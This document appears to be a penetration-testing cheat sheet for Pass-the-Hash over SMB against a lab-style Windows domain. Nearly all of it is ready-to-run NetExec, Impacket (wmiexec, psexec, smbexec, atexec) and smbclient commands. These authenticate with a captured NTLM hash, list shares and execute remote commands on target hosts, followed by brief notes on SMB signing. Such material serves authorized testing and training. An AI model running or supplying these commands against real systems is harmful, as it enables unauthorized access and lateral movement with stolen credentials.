Pass-the-Hash over SMB uses an NTLM hash instead of a plaintext password. It is useful when we recover a local administrator hash, a domain account hash, or a service account hash and need to validate where it works.
NetExec domain hash
nxc smb 10.10.10.0/24 -d ootw.local -u Administrator -H NTLM_HASH
nxc smb 10.10.10.201 -d ootw.local -u Administrator -H NTLM_HASH --shares
NetExec local admin hash
nxc smb 10.10.10.0/24 -u Administrator -H NTLM_HASH --local-auth
nxc smb 10.10.10.201 -u Administrator -H NTLM_HASH --local-auth --shares
Impacket
wmiexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
psexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
smbexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH
atexec.py ootw.local/Administrator@10.10.10.201 -hashes :NTLM_HASH "whoami /all"
smbclient hash auth
smbclient //10.10.10.201/C$ -U Administrator --pw-nt-hash NTLM_HASH
Validate admin
nxc smb 10.10.10.201 -d ootw.local -u Administrator -H NTLM_HASH
nxc smb 10.10.10.201 -d ootw.local -u Administrator -H NTLM_HASH -x "whoami /all"
Notes
- Pass-the-Hash does not require SMB signing to authenticate.
- SMB signing blocks classic NTLM relay to SMB, not normal hash-based authentication with a valid account hash.